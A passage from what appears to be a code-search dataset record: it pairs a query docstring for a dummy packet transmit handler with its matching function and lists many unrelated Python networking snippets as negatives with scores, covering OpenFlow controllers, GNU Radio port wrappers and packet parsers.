self.dbdpae.find_one({'dpid': dpid})\n if db_result:\n self.logger.info(\"Found DPAE for dpid=%s, adding AMF entry\",\n dpid)\n #*** Get the dpae port for that switch:\n #*** TBD, handle more than one DPAE per switch\n dpae_port = db_result['switch_port']\n if dpae_port:\n #*** Add FE to the Active Mode Filter (ft_amf) Flow table:\n self.logger.info(\"Adding AMF entry dpid=%s dpae_port=%s \"\n \"mac=%s\", dpid, dpae_port, eth.src)\n switch.flowtables.add_fe_amf_macport_dst(dpae_port,\n eth.src)\n else:\n self.logger.error(\"No DPAE switch port for dpid=%s\", dpid)\n else:\n self.logger.debug(\"No DPAE found for dpid=%s\", dpid)\n\n #*** Add source MAC / in port to Forwarding table as destinations so\n #*** that we don't flood them:\n switch.flowtables.add_fe_fwd_macport_dst(in_port, eth.src)\n\n #*** Add source MAC / in port to Identity Indicator (MAC) table so\n #*** that we don't get further packet in events for this combo:\n switch.flowtables.add_fe_iim_macport_src(in_port, eth.src)\n\n #*** Do a packet out to avoid going through DPAE in active mode\n #*** which causes bad MAC learning in adjacent switches\n #*** if forwarding entry not installed:\n\n # Send out specific port if known or flood:\n out_port = switch.mactable.mac2port(eth.dst, context)\n if out_port == switch_abstraction.PORT_NOT_FOUND:\n out_port = ofproto.OFPP_FLOOD\n\n #*** Packet out:\n switch.packet_out(msg.data, in_port, out_port, 0, 1)", "def message_ports_in(self):\n return _uhd_swig.usrp_source_sptr_message_ports_in(self)", "def testGetIngressPort(self):\n self.oxc.get_ingress(file_name = 'get_ingress_port.xml')", "def message_ports_in(self) -> \"pmt::pmt_t\":\n return _beamforming_swig.doaesprit_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _spacegrant_swig.ax25_pdu_unpacker_sptr_message_ports_in(self)", "def dataInfo(self, out):\n addr = -1\n i = 0\n while i <= 65536:\n # data\n if (i == 65536 or self.ihxData[i] < 0) and addr >= 0:\n print i - addr + \" Bytes from \" + Integer.toHexString(addr) + \" to \" + Integer.toHexString(i - 1)\n addr = -1\n if i < 65536 and self.ihxData[i] >= 0 and addr < 0:\n addr = i\n i += 1", "def message_ports_in(self):\n return _spacegrant_swig.udp_debug_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _spacegrant_swig.DeNRZI_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _spacegrant_swig.invert_bit_sptr_message_ports_in(self)", "def _handle_PacketIn(self, event):\n\n packet = event.parsed # This is the parsed packet data.\n if not packet.parsed:\n log.warning(\"Ignoring incomplete packet\")\n return\n\n packet_in = event.ofp # The actual ofp_packet_in message.\n\n # Comment out the following line and uncomment the one after\n # when starting the exercise.\n # self.act_like_hub(packet, packet_in)\n # self.act_like_switch(packet, packet_in)\n self.act_like_router(packet, packet_in)", "def testGetConfigIngressPorts(self):\n self.oxc.getconfig_ingress_ports(file_name = 'getconfig_ingress_ports.xml', ingress_ports = oxcDict['valid_ingress_ports'])", "def message_ports_in(self):\n return _TestA_swig.my_qpsk_demod_cb_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _spacegrant_swig.hdlc_framer_sptr_message_ports_in(self)", "def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):\n logger.info('INT Packet data - [%s]', extract_int_data(packet[Ether]))\n return False", "def connect_icache(self, port: Port) -> None:\n self.port_end.req_ports = port", "def _handle_PacketIn(self, event):\r\n\r\n packet = event.parsed # This is the parsed packet data.\r\n if not packet.parsed:\r\n log.warning(\"Ignoring incomplete packet\")\r\n return\r\n\r\n packet_in = event.ofp # The actual ofp_packet_in message.\r\n\r\n # Comment out the following line and uncomment the one after\r\n # when starting the exercise.\r\n #self.act_like_hub(packet, packet_in)\r\n self.act_like_switch(packet, packet_in)\r\n #self.act_like_router(packet, packet_in)\r", "def send_packet_out(dp, pkt, out_port, in_port=ofp.OFPP_CONTROLLER):\n actions = [parser.OFPActionOutput(out_port)]\n msg = parser.OFPPacketOut(datapath=dp,\n buffer_id=ofp.OFP_NO_BUFFER,\n in_port=in_port,\n actions=actions,\n data=pkt)\n return msg", "def testGetConfigIngressPort(self):\n self.oxc.getconfig_ingress(file_name = 'getconfig_ingress_port.xml')", "def _handle_ConnectionIn (self, event, flow, packet):\n log.debug(\"Allowed connection [\" + str(flow.src) + \":\" + str(flow.srcport) + \",\" + str(flow.dst) + \":\" + str(flow.dstport) + \"]\" )\n event.action.forward = True", "def message_ports_in(self) -> \"pmt::pmt_t\":\n return _beamforming_swig.beamformer_sptr_message_ports_in(self)", "def get_input_data_value(node: Node, port: int):\n return node.in_port(port).data.get_value()", "def WriteToPipeIn(self, epAddr, data): \n return self._server.write_to_pipe_in(self._serial, epAddr, list(data))", "def inb():", "def _parse_packet(packet: StreamMessageResponse) -> Packet:\n if packet is None:\n raise TypeError(\"Packet cannot be None!\")\n\n packet = MessageToDict(packet)\n\n # Decoding Header\n ingress_port_base64 = packet['packet']['metadata'][0]['value'].encode()\n ingress_port = base64.decodebytes(ingress_port_base64) # retrieving ingress_port; not used, yet\n\n # Decoding Payload\n packet = _scapy_parse(packet)\n\n return packet", "def read_in_buf(self):\n\t\treturn self._server_in_buf", "def message_ports_in(self):\n return _spacegrant_swig.general_burster_2_sptr_message_ports_in(self)", "def _handle_DeferredConnectionIn (self, event, flow, packet):\n pass", "def get_incoming_port(self):\n\t\treturn call_sdk_function('PrlPortFwd_GetIncomingPort', self.handle)", "def message_ports_in(self):\n return _spacegrant_swig.message_debug_sptr_message_ports_in(self)", "def dummy_transmit_handler(out_port, packet):\n pass", "def OnESPacket(current_pid, packet, header_size):\n pass", "def message_ports_in(self) -> \"pmt::pmt_t\":\n return _beamforming_swig.randomsampler_sptr_message_ports_in(self)", "def message_ports_in(self):\n return _add_vector_swig.add_vector_2_cpp_sptr_message_ports_in(self)", "def parse_fifo_data(data: bytearray) -> None:\n return int.from_bytes(data, byteorder='little', signed=True)", "def add_fe_iim_macport_src(self, in_port, eth_src):\n ofproto = self.datapath.ofproto\n parser = self.datapath.ofproto_parser\n #*** Priority needs to be greater than 0:\n priority = 1\n match = parser.OFPMatch(in_port=in_port, eth_src=eth_src)\n actions = []\n inst = [parser.OFPInstructionActions(\n ofproto.OFPIT_APPLY_ACTIONS, actions),\n parser.OFPInstructionGotoTable(self.ft_iim + 1)]\n mod = parser.OFPFlowMod(datapath=self.datapath, table_id=self.ft_iim,\n priority=priority,\n idle_timeout=self.mac_iim_idle_timeout,\n flags=ofproto.OFPFF_SEND_FLOW_REM,\n match=match,\n instructions=inst)\n self.datapath.send_msg(mod)", "def _get_data(self):\n raw_data = self._get_raw_data()\n if not raw_data:\n return None\n result = {}\n for line in raw_data:\n if 'tcp' in line:\n parts = line.split()\n proto = parts[0]\n local_addr = parts[3]\n state = parts[5]\n ip, port = local_addr.rsplit(':', 1)\n port = str(port)\n result[port] = 1\n if state == 'LISTEN':\n if port not in self.charts['ports']:\n self.charts['ports'].add_dimension([port, port, 'absolute'])\n return result", "def read_in_buf(self):\n return self._server_in_buf", "def __packet_stuff(self, data):\n stuffed = bytearray()\n stuffed.append(0x7e)\n for count in data:\n if count >= 0x7d and count <= 0x7f:\n stuffed.append(0x7d)\n stuffed.append(count - 0x7d)\n else:\n stuffed.append(count)\n stuffed.append(0x7f)\n return(stuffed)", "def get_tcp_packet_payload(pkt: dpkt.ethernet.Ethernet) -> bytes:\n eth = dpkt.ethernet.Ethernet(pkt)\n if isinstance(eth.data, dpkt.ip.IP) and isinstance(eth.data.data, dpkt.tcp.TCP):\n return eth.data.data.data", "def callback(self, packet):\n\n\t\tsrc = packet[IP].src\n\t\tdst = packet[IP].dst\n\n\t\tif TCP in packet:\n\t\t\tsrc_port = packet[TCP].sport\n\t\t\tdst_port = packet[TCP].dport\n\t\telif UDP in packet:\n\t\t\tsrc_port = packet[UDP].sport\n\t\t\tdst_port = packet[UDP].dport\n\t\telse:\n\t\t\tsrc_port = \"other\"\n\t\t\tdst_port = \"other\"\n\n\t\tdata = src + \":\" + str(src_port) + \"-\" + dst + \":\" + str(dst_port)\n\t\tdata = self.padding(data)\n\t\tsock.send(data.encode())", "def __udp_preprocess_packet(self, seq):\n return b'06' + seq.to_bytes(4, 'big') \\\n + self.packets_status[seq][\"size\"].to_bytes(2, 'big') \\\n + self.packets_status[seq][\"payload\"]", "def packet_read(self):\n bytes_received = 0\n \n if self.sock == NC.INVALID_SOCKET:\n return NC.ERR_NO_CONN\n \n if self.in_packet.command == 0:\n ba_data, errnum, errmsg = nyamuk_net.read(self.sock, 1)\n if errnum == 0 and len(ba_data) == 1:\n bytes_received += 1\n byte = ba_data[0]\n self.in_packet.command = byte\n \n if self.as_broker:\n if self.bridge is None and self.state == NC.CS_NEW and (byte & 0xF0) != NC.CMD_CONNECT:\n print \"RETURN ERR_PROTOCOL\"\n return NC.ERR_PROTOCOL, bytes_received\n else:\n if errnum == errno.EAGAIN or errnum == errno.EWOULDBLOCK:\n return NC.ERR_SUCCESS, bytes_received\n elif errnum == 0 and len(ba_data) == 0 or errnum == errno.ECONNRESET:\n return NC.ERR_CONN_LOST, bytes_received\n else:\n evt = event.EventNeterr(errnum, errmsg)\n self.push_event(evt)\n return NC.ERR_UNKNOWN, bytes_received\n \n if not self.in_packet.have_remaining:\n loop_flag = True\n while loop_flag:\n ba_data, errnum, errmsg = nyamuk_net.read(self.sock, 1)\n \n if errnum == 0 and len(ba_data) == 1: \n byte = ba_data[0]\n bytes_received += 1\n self.in_packet.remaining_count += 1\n if self.in_packet.remaining_count > 4:\n return NC.ERR_PROTOCOL, bytes_received\n \n self.in_packet.remaining_length += (byte & 127) * self.in_packet.remaining_mult\n self.in_packet.remaining_mult *= 128\n else:\n if errnum == errno.EAGAIN or errnum == errno.EWOULDBLOCK:\n return NC.ERR_SUCCESS, bytes_received\n elif errnum == 0 and len(ba_data) == 0 or errnum == errno.ECONNRESET:\n return NC.ERR_CONN_LOST, bytes_received\n else:\n evt = event.EventNeterr(errnum, errmsg)\n self.push_event(evt)\n return NC.ERR_UNKNOWN, bytes_received\n \n if (byte & 128) == 0:\n loop_flag = False\n \n if self.in_packet.remaining_length > 0:\n self.in_packet.payload = bytearray(self.in_packet.remaining_length)\n if self.in_packet.payload is None:\n return NC.ERR_NO_MEM, bytes_received\n self.in_packet.to_process = self.in_packet.remaining_length\n \n self.in_packet.have_remaining = True\n \n if self.in_packet.to_process > 0:\n ba_data, errnum, errmsg = nyamuk_net.read(self.sock, self.in_packet.to_process)\n if errnum == 0 and len(ba_data) > 0:\n readlen = len(ba_data)\n bytes_received += readlen\n for idx in xrange(0, readlen):\n self.in_packet.payload[self.in_packet.pos] = ba_data[idx]\n self.in_packet.pos += 1\n self.in_packet.to_process -= 1\n else:\n if errnum == errno.EAGAIN or errnum == errno.EWOULDBLOCK:\n return NC.ERR_SUCCESS, bytes_received\n elif errnum == 0 and len(ba_data) == 0 or errnum == errno.ECONNRESET:\n return NC.ERR_CONN_LOST, bytes_received\n else:\n evt = event.EventNeterr(errnum, errmsg)\n self.push_event(evt)\n return NC.ERR_UNKNOWN, bytes_received\n\n #all data for this packet is read\n self.in_packet.pos = 0\n \n ret = self.packet_handle()\n \n self.in_packet.packet_cleanup()\n \n self.last_msg_in = time.time()\n \n return ret, bytes_received", "def _handle_PacketIn(self, event):\n\n packet = event.parsed # Packet is the original L2 packet sent by the switch\n if not packet.parsed:\n log.warning(\"Ignoring incomplete packet\")\n return\n # ignore lldp packets\n if event.parsed.type == ethernet.LLDP_TYPE:\n return\n # act like switch\n packet_in = event.ofp # packet_in is the OpenFlow packet sent by the switch\n self.act_like_switch(packet, packet_in)", "def send_traffic_data(serialport, pack):\n pack[0] = 0x01\n pack[1] = 0x00\n serialport.write(pack)\n logging.debug(\"Traffic Data - Sent.\")\n logging.debug(str(pack))", "def message_ports_in(self):\n return _TestA_swig.cleanslate_sptr_message_ports_in(self)", "def _icmp_send(dp, port_out, ip_src=DISCOVERY_IP_SRC, ip_dst=DISCOVERY_IP_DST,\n eth_src='02:b0:00:00:00:b5', eth_dst='02:bb:bb:bb:bb:bb',\n icmp_type=8, icmp_code=0):\n\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n pkt = packet.Packet()\n pkt.add_protocol(ethernet.ethernet(ethertype=0x0800,\n dst=eth_dst,\n src=eth_src))\n\n pkt.add_protocol(ipv4.ipv4(dst=ip_dst,\n src=ip_src,\n proto=1))\n\n ##Latency measurement\n my_clock = str(time.clock())\n\n ##TODO: Rework payload and codes to properly work with Fragmentation needed\n pkt.add_protocol(icmp.icmp(type_=icmp_type,\n code=icmp_code,\n csum=0,\n data=icmp.echo(1,1,\"{'dpid' : \"+str(dp.id)+\",'port_out' : \"+str(port_out)+\",'clock' : \"+my_clock+\"}\")))\n pkt.serialize()\n data=pkt.data\n actions=[parser.OFPActionOutput(port_out,0)]\n out=parser.OFPPacketOut(datapath=dp, buffer_id=ofp.OFP_NO_BUFFER, in_port=ofp.OFPP_CONTROLLER, actions=actions, data=data)\n ##LOG.debug('***ICMP DEBUG*** Sending ICMP with Payload: ' + \"{'dpid' : \"+str(dp.id)+\",'port_out' : \"+str(port_out)+\",'clock' : \"+my_clock+\"}\" )\n dp.send_msg(out)", "def handle_in_bound(self, convo, packet):\n\n convo['in_pkts'].append(packet)\n\n # Latency between tap and client\n if packet['tcp']['flags']['ACK']: \n if convo['syn_ack_num'] == (packet['tcp']['ack_num'] - 1):\n convo['latency'] = packet['ts'] - convo['syn_ack_ts']\n\n # Check if FIN by client\n if packet['tcp']['flags']['FIN']:\n convo['client_fin'] = packet['ts']\n\n if convo.get('server_fin') is not None:\n # Expire conversation\n convo['end_pos'] = packet['pos']\n try:\n self.reconstruct(convo)\n self.store(convo)\n finally:\n # Make sure stuff gets deleted no matter what\n del self.conv[convo['source_key']]\n del convo\n\n # Check for RST by client\n if packet['tcp']['flags']['RST']:\n convo['client_rst'] = True\n convo['end_pos'] = packet['pos']\n try:\n self.reconstruct(convo)\n self.store(convo)\n finally:\n # Make sure stuff gets deleted no matter what\n del self.conv[convo['source_key']]\n del convo", "def _backend_port_to_port(self, backend_port):\n return models.Port(\n backend_id=backend_port['nic'],\n name=backend_port['label'],\n # MAC address is optional\n mac_address=backend_port.get('mac_address'),\n state=models.Port.States.OK,\n runtime_state=backend_port['state'],\n )", "def get_ip_port_tshark(str_data):\n separator = str_data.rindex(\":\")\n ip = str_data[:separator]\n port = str_data[separator + 1:]\n return ip, port", "def Port(self) -> int:", "def _build_packet_out(self, datapath, buffer_id, src_port, dst_port, data):\r\n actions = []\r\n if dst_port:\r\n actions.append(datapath.ofproto_parser.OFPActionOutput(dst_port))\r\n\r\n msg_data = None\r\n if buffer_id == datapath.ofproto.OFP_NO_BUFFER:\r\n if data is None:\r\n return None\r\n msg_data = data\r\n\r\n out = datapath.ofproto_parser.OFPPacketOut(\r\n datapath=datapath, buffer_id=buffer_id,\r\n data=msg_data, in_port=src_port, actions=actions)\r\n return out", "def _send_packet_out(self, packet: Packet, port) -> None:\n try:\n p = self.shell.PacketOut(bytes(packet), egress_port=str(port))\n p.send()\n logging.debug(\"Sending packet out: egress_port {}\".format(port))\n except UserError as e:\n logging.debug(e)\n return", "def __init__(self, packet: Dict[str, Any]) -> None:\n self.source_address = packet['ip_header']['source_address']\n self.source_port = packet['tcp_header']['source_port']\n self.destination_address = packet['ip_header']['destination_address']\n self.destination_port = packet['tcp_header']['destination_port']\n\n self.packets = [(TCPStream.INBOUND, packet)]", "def process(self, parsed_packet):\n byte_buf = parsed_packet.serialize()\n out_port= parsed_packet.get_field(\"intrinsic_metadata.egress_port\")\n logging.debug(\"Transmit pkt id %d to %d\" % (parsed_packet.id, out_port))\n buf = bytearray(byte_buf)\n for idx in range((len(buf) + 19)/20):\n logging.debug(hexify(buf[20*idx : 20*(idx+1)], 20))\n\n self.transmit_handler(out_port, byte_buf)", "def packet_out(self, data, in_port, out_port, out_queue, nq=0):\n ofproto = self.datapath.ofproto\n parser = self.datapath.ofproto_parser\n dpid = self.datapath.id\n #*** First build OF version specific list of actions:\n if nq:\n #*** Packet out with no queue (nq):\n actions = [self.datapath.ofproto_parser.OFPActionOutput \\\n (out_port, 0)]\n\n else:\n #*** Note: out_port must come last!\n actions = [\n parser.OFPActionSetQueue(out_queue),\n parser.OFPActionOutput(out_port, 0)]\n\n #*** Now have we have actions, build the packet out message:\n out = parser.OFPPacketOut(\n datapath=self.datapath, buffer_id=ofproto.OFP_NO_BUFFER,\n in_port=in_port, actions=actions, data=data)\n\n self.logger.debug(\"Sending Packet-Out message dpid=%s port=%s\",\n dpid, out_port)\n #*** Tell the switch to send the packet:\n self.datapath.send_msg(out)", "def read_interrupt_capture(self, port):\n value = 0\n if port == 0:\n value = self.__bus.read_byte_data(self.__ioaddress, self.INTCAPA)\n else:\n value = self.__bus.read_byte_data(self.__ioaddress, self.INTCAPB)\n return value", "def protocol_in(self, protocol_in):\n\n self._protocol_in = protocol_in", "def parse_packet(data):\n ip = IPPacket(data)\n icmp = ICMPPacket(ip.payload)\n print('ICMP message from %s, type %d (%s), code %d, %d byte payload.') % (\n ip.src_addr, icmp.type, ICMP_TYPES[icmp.type], icmp.code,\n len(icmp.payload))\n return len(icmp.payload)", "def read_packetlen(self):\n packetlen = int(struct.unpack('!I', b\"\".join(self.__input))[0])\n self.__input = []\n self.set_terminator(packetlen)\n self.found_terminator = self.read_milter_data", "def RequestData(self, request, inInfo, outInfo):\n # Inputs from different ports:\n pdi0 = self.GetInputData(inInfo, 0, 0)\n pdi1 = self.GetInputData(inInfo, 1, 0)\n pdo = self.GetOutputData(outInfo, 0)\n\n pdo.DeepCopy(pdi0)\n\n # Get number of rows\n nrows = pdi0.GetNumberOfRows()\n nrows1 = pdi1.GetNumberOfRows()\n assert(nrows == nrows1)\n\n for i in range(pdi1.GetRowData().GetNumberOfArrays()):\n arr = pdi1.GetRowData().GetArray(i)\n pdo.GetRowData().AddArray(arr)\n return 1", "def message_ports_in(self):\n return _spacegrant_swig.hdlc_deframer_sptr_message_ports_in(self)", "def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):\n return", "def get_input_shape(node: Node, in_port: int):\n if in_port not in node.in_ports():\n raise Exception('Can\\'t get shape for {} port of {} node. No such port in node'.format(in_port, node.name))\n in_port = node.in_port(in_port)\n return in_port.data.get_shape()", "def handle_udp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n length = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(length)\r\n packets[i][2].append(checksum_value)\r\n\r\n return packets", "def encode_packet(self, packet):\n\n\t\ttry:\n\t\t\toutput = self.pack('ubyte', packet.ident)\n\t\t\tappend = ''\n\t\t\t#0x17\n\t\t\tif packet.ident == 0x17:\n\t\t\t\tif packet.data['unknown'] > 0:\n\t\t\t\t\tfor i in ('x2','y2','z2'):\n\t\t\t\t\t\tappend += self.pack('short', packet.data[i])\n\t\t\t#0x33\n\t\t\tif packet.ident in (0x33, 0x34):\n\t\t\t\tpacket.data['data_size'] = len(packet.data['data'])\n\t\t\t\tappend += self.pack_array_fast('byte', packet.data['data'])\n\t\t\t\n#\t\t\t#0x34\n#\t\t\tif packet.ident == 0x34:\n#\t\t\t\tcoords = []\n#\t\t\t\tbtypes = []\n#\t\t\t\tmetadata = []\n#\t\t\t\tfor i in packet.data['blocks']:\n#\t\t\t\t\tcoords.append(i['x'] << 12 | i['z'] << 8 | i['y'])\n#\t\t\t\t\tbtypes.append(i['type'])\n#\t\t\t\t\tmetadata.append(i['metadata'])\n#\t\t\t\t\n#\t\t\t\tpacket.data['data_size'] = len(coords)\n#\t\t\t\tappend += self.pack_array_fast('short', coords)\n#\t\t\t\tappend += self.pack_array_fast('byte', btypes)\n#\t\t\t\tappend += self.pack_array_fast('byte', metadata)\n\t\t\t\n\t\t\t#0x3C\n\t\t\tif packet.ident == 0x3C:\n\t\t\t\tarray = []\n\t\t\t\tfor i in packet.data['blocks']:\n\t\t\t\t\tarray += [i['x'], i['y'], i['z']]\n\t\t\t\tpacket.data['data_size'] = len(packet.data['blocks'])\n\t\t\t\tappend += self.pack_array_fast('byte', array)\n\t\t\t\n\t\t\t#0x68\n\t\t\tif packet.ident == 0x68:\n\t\t\t\tpacket.data['data_size'] = len(packet.data['slots_data'])\n\t\t\t\tappend += self.pack_array('slot', packet.data['slots_data'])\n\t\t\t#0x82: Sign\n\t\t\tif packet.ident == 0x82:\n\t\t\t\tfor i in range(4):\n\t\t\t\t\tpacket.data[\"line_%s\" % (i+1)] = packet.data[\"text\"][i]\n\t\t\t#0x83\n\t\t\tif packet.ident == 0x83:\n\t\t\t\tpacket.data['data_size'] = len(packet.data['data'])\n\t\t\t\tappend += self.pack_array_fast('byte', packet.data['data'])\n\t\t\n\t\t\tfor i in self.get_struct(packet):\n\t\t\t\toutput += self.pack(i[0], packet.data[i[1]])\n\t\t\t\n\t\t\toutput += append\n\t\t\treturn output\n\t\texcept Exception:\n\t\t\traise", "def trafficInboundPorts(self):\n #\n # TODO: Reimplement this if possible\n #\n return client.trafficInboundPorts(self)", "def _validate_ens_net_portsecurity(self, net_data):\n pass", "def port_not_in(self, port_not_in):\n\n self._port_not_in = port_not_in", "def port_not_in(self, port_not_in):\n\n self._port_not_in = port_not_in", "def preprocess(self, data):\n (w,h,f) = self.rawinputformat()\n dt = numpy.dtype(numpy.uint8)\n nb = numpy.frombuffer(data,dt,-1,0)\n actual_stream_width = (w&1)+w # hack, rather get this from the app sink\n if(actual_stream_width != self.reqsize):\n nb = nb.reshape(h,actual_stream_width,3)\n nb = nb[0:h,0:w,0:3] # crop to network input size\n else:\n nb = nb.reshape((actual_stream_width,actual_stream_width,3))\n img = nb.astype('float32')\n #Preprocess image\n #for i in range(3):\n # img[:,:,i] = (img[:,:,i] - self.mean[i]) * self.std[i]\n #img = resize(img/255.0,(w,h),1)\n img = img/255.0\n print(img.shape)\n #print(img[0,0,:])\n return img.astype(numpy.float16)", "def _get_nport(self):\n return self.__nport", "def PacketFromReceiver(self, packet):\n # TODO: Implement TCP here.\n pass", "def ingress_config(self) -> Optional[pulumi.Input['IngressConfigArgs']]:\n return pulumi.get(self, \"ingress_config\")", "def data_received(self, data):\n for byte in serial.iterbytes(data):\n if self.in_data and (len(self.packet) < self.data_size):\n self.packet.extend(byte)\n if len(self.packet) == self.data_size:\n self.in_data = False\n # make read-only copy\n self.handle_packet(bytes(self.packet))\n del self.packet[:]\n # Since there is no 'byte' object, indexing a bytes or bytearray\n # object yields an int. Instead, we need to compare a bytes object\n # of size 1 with a bytes object of size 1\n elif byte == self.HEADER[self.header_pos:self.header_pos+1]:\n self.header_pos += 1\n if self.header_pos == len(self.HEADER):\n self.header_pos = 0\n self.in_data = True\n else:\n self.header_pos = 0", "def decode(self,buf):\n eth = dpkt.ethernet.Ethernet(buf)\n pkt_len = len(buf)\n if(eth.type== dpkt.ethernet.ETH_TYPE_IP):\n ip = eth.data\n dst_ip = socket.inet_ntoa(ip.dst)\n src_ip = socket.inet_ntoa(ip.src)\n octet_list = string.split(dst_ip,'.')\n broadcast = False\n for o in octet_list:\n if (o == \"255\"):\n broadcast = True\n break\n if((octet_list[0] == \"224\") or (octet_list[0] == \"239\")):\n broadcast = True #Its multicast actually.\n if not broadcast:\n if(ip.p == dpkt.ip.IP_PROTO_TCP):\n pass\n elif(ip.p == dpkt.ip.IP_PROTO_UDP):\n udp =ip.data\n if((udp.dport == 53) or (udp.sport == 53)): # A request. \n if(udp.dport == 53): # A request. \n return self.dns_handler.handle_dns_request(ip.src,ip.dst,ip.p,udp.sport,udp.dport,udp.data)\n if(udp.sport == 53): # A DNS response\n self.dns_handler.handle_dns_response(ip.src,ip.dst,ip.p,udp.sport,udp.dport,udp.data)\n else:\n pass" ]
[ "0.6083645", "0.6083645", "0.6004842", "0.5940256", "0.58412826", "0.5745346", "0.56811863", "0.56805307", "0.56792486", "0.5678725", "0.55001324", "0.5463868", "0.545723", "0.54208636", "0.5390863", "0.5390862", "0.537292", "0.5355706", "0.5340329", "0.5338251", "0.5322882", "0.5310049", "0.5300135", "0.5296107", "0.52940166", "0.5285544", "0.5272581", "0.52451754", "0.52399856", "0.5237932", "0.5228706", "0.52188355", "0.52087027", "0.5183115", "0.5158989", "0.51232654", "0.5110588", "0.5092747", "0.50772595", "0.5056112", "0.5043114", "0.5039806", "0.50344354", "0.50336766", "0.5026967", "0.50265044", "0.49873203", "0.49829775", "0.49825504", "0.4980617", "0.49695927", "0.4936405", "0.49311095", "0.49307865", "0.49286452", "0.491929", "0.49147418", "0.4892436", "0.4891645", "0.4886199", "0.48651513", "0.48478356", "0.48474348", "0.48349", "0.48317665", "0.48248994", "0.48227954", "0.48051482", "0.4794901", "0.47937927", "0.47842795", "0.4770235", "0.4769043", "0.47689015", "0.47622252", "0.47582713", "0.47487843", "0.4738657", "0.4729835", "0.47253552", "0.47206187", "0.4717365", "0.4696819", "0.4689705", "0.46870726", "0.46828488", "0.4670389", "0.46627396", "0.46504024", "0.46358055", "0.46352118", "0.46288493", "0.4628687", "0.4628687", "0.46268198", "0.46264943", "0.46227932", "0.4622501", "0.46163377", "0.46083903" ]
0.5686567
6
Transmit handler template for documentation out_port The port number to which the packet is to be sent packet A bytearray object holding the packet to transmit
def dummy_transmit_handler(out_port, packet): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def write(self, out):", "def _post(self, which_port, msg):\n return _spacegrant_swig.binary_sink_sptr__post(self, which_port, msg)", "def send_traffic_data(serialport, pack):\n pack[0] = 0x01\n pack[1] = 0x00\n serialport.write(pack)\n logging.debug(\"Traffic Data - Sent.\")\n logging.debug(str(pack))", "def process(self, parsed_packet):\n byte_buf = parsed_packet.serialize()\n out_port= parsed_packet.get_field(\"intrinsic_metadata.egress_port\")\n logging.debug(\"Transmit pkt id %d to %d\" % (parsed_packet.id, out_port))\n buf = bytearray(byte_buf)\n for idx in range((len(buf) + 19)/20):\n logging.debug(hexify(buf[20*idx : 20*(idx+1)], 20))\n\n self.transmit_handler(out_port, byte_buf)", "def add_out_port(self, m: int, content: str, **opts) -> None:", "def _send_packet_out(self, packet: Packet, port) -> None:\n try:\n p = self.shell.PacketOut(bytes(packet), egress_port=str(port))\n p.send()\n logging.debug(\"Sending packet out: egress_port {}\".format(port))\n except UserError as e:\n logging.debug(e)\n return", "def __init__(self, port):\n self.port = port\n self.action_type = 'output'", "def send_packet_out(dp, pkt, out_port, in_port=ofp.OFPP_CONTROLLER):\n actions = [parser.OFPActionOutput(out_port)]\n msg = parser.OFPPacketOut(datapath=dp,\n buffer_id=ofp.OFP_NO_BUFFER,\n in_port=in_port,\n actions=actions,\n data=pkt)\n return msg", "def sendto(self, data: bytes, address: Tuple) -> int:\n ...", "def record(self, port_name, t_start=None):", "def port_out(self) -> int:\n return self.proto.port_out", "def OutputPort(*args, **kw):\n return Port.make_shared(OutputPortInterface(*args, **kw))", "def _post(self, which_port, msg):\n return _spacegrant_swig.ax25_udp_pdu_gen_sptr__post(self, which_port, msg)", "def _post(self, which_port, msg):\n return _spacegrant_swig.ax25_pdu_packer_sptr__post(self, which_port, msg)", "def transmit(self, value):\n if (self.__sink == None):\n return\n target = self.__sink.target\n target(value)", "def net_send(out_data: bytes, conn: socket.socket) -> None:\n print(\"Sending {} bytes\".format(len(out_data)))\n conn.send(out_data)", "def output_generator(pkt):\r\n ethe_header = pkt[0]\r\n ip_header = pkt[1]\r\n protocol = pkt[1][7]\r\n data_header = pkt[2]\r\n ethe_prefix = \"ETHER: \"\r\n ip_prefix = \"IP: \"\r\n tcp_prefix = \"TCP: \"\r\n udp_prefix = \"UDP: \"\r\n icmp_prefix = \"ICMP: \"\r\n # print ether header information\r\n print(\"\\n\" + ethe_prefix + \"----- Ether Header -----\")\r\n print(ethe_prefix)\r\n print(ethe_prefix + \"Packet size = \" + str(ethe_header[0]) + \" bytes\")\r\n print(ethe_prefix + \"Destination = \" + str(ethe_header[1]))\r\n print(ethe_prefix + \"Source = \" + str(ethe_header[2]))\r\n print(ethe_prefix + \"Ethertype = \" + str(ethe_header[3]) + \" (IP)\")\r\n print(ethe_prefix)\r\n\r\n print(ip_prefix + \"----- IP Header -----\")\r\n print(ip_prefix)\r\n print(ip_prefix + \"Version = \" + str(ip_header[0]))\r\n print(ip_prefix + \"Header length = \" + str(4 * int(ip_header[1])) + \" bytes\")\r\n print(ip_prefix + \"Type of service = 0x\" + str(ip_header[2]))\r\n if str(ip_header[2]) == \"00\":\r\n print(ip_prefix + \"\\txxx. .... = 0 (precedence)\")\r\n print(ip_prefix + \"\\t...0 .... = normal delay\")\r\n print(ip_prefix + \"\\t.... 0... = normal throughput\")\r\n print(ip_prefix + \"\\t.... .0.. = normal reliability\")\r\n print(ip_prefix + \"Total length = \" + str(ip_header[3]) + \" bytes\")\r\n print(ip_prefix + \"Identification = \" + str(ip_header[4]))\r\n print(ip_prefix + \"Flags = 0x\" + str(ip_header[5]))\r\n flag = str(format(int(ip_header[5][0]), '04b'))\r\n if flag[0] == \"0\":\r\n print(ip_prefix + \"\\t0... ... = Reserved bit: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t1... ... = Reserved bit: set\")\r\n if flag[1] == \"0\":\r\n print(ip_prefix + \"\\t.0.. ... = Don't fragment: Not set\")\r\n else:\r\n print(ip_prefix + \"\\t.1.. ... = Don't fragment: set\")\r\n if flag[2] == \"0\":\r\n print(ip_prefix + \"\\t..0. ... = More fragments: Not set\")\r\n else:\r\n 